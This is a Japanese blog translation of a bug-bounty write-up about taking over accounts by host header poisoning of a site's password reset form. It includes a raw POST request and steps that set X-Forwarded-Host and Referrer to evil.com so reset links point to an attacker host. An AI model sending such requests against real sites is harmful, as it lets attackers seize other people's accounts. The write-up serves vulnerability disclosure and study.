Shikata Ga Nai

Private? There is no such things.

ATO via Host Header Poisoningを訳してみた

Hello there, ('ω')ノ

 

ホストヘッダポイズニングによるATOを。

 

脆弱性:

 ホストヘッダインジェクション

 アカウントの乗っ取り

 パスワードリセットの欠陥

 

記事:

 https://sechunter.medium.com/ato-via-host-header-poisoning-dc5c29d2fd0d

 

今回は、ホストヘッダポイズニングによるアカウント乗っ取りのバグについて。

Redacted.comは、リモートの攻撃者がそれを悪用して。

redacted.comのアカウントを乗っ取ることができる。

ホストヘッダインジェクションに対して脆弱で。

 

攻撃シナリオ:

攻撃者として、最初にHostヘッダの値をevil.comに変更するPOSTリクエストを。

変更しましたものの何も起こらず。

次に、evil.com値を持つX-Forwarded-Hostヘッダを追加しても何も起こらず。

次にReferrerヘッダの値も変更し。

X-Forwarded-Hostヘッダの値と同じ値を設定すると機能して。

リクエストは次のようになって。

 

    POST /forgot HTTP/1.1
    Host: redacted.com
    X-Forwarded-Host: evil.com
    Referrer: https://evil.com

    username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e

 

f:id:ThisIsOne:20220122104709p:plain

 

リクエストを送信した後、evil.comは次のようになって。

悪意のあるホストとの電子メールを受け取って。

 

f:id:ThisIsOne:20220122104737p:plain


複製するステップ:

1.「https://redacted.com/forgot」に移動して。

2.ユーザ名を入力し、Burp Suiteを使用してそのリクエストを傍受して。

3.2つのヘッダをPOSTリクエストに追加して。

   X-Forwarded-Host: evil.com
   Referrer: https://evil.com

4.そのリクエストを転送して。

  ユーザ名にリンクされている電子メールを確認して。

 

Best regards, (^^ゞ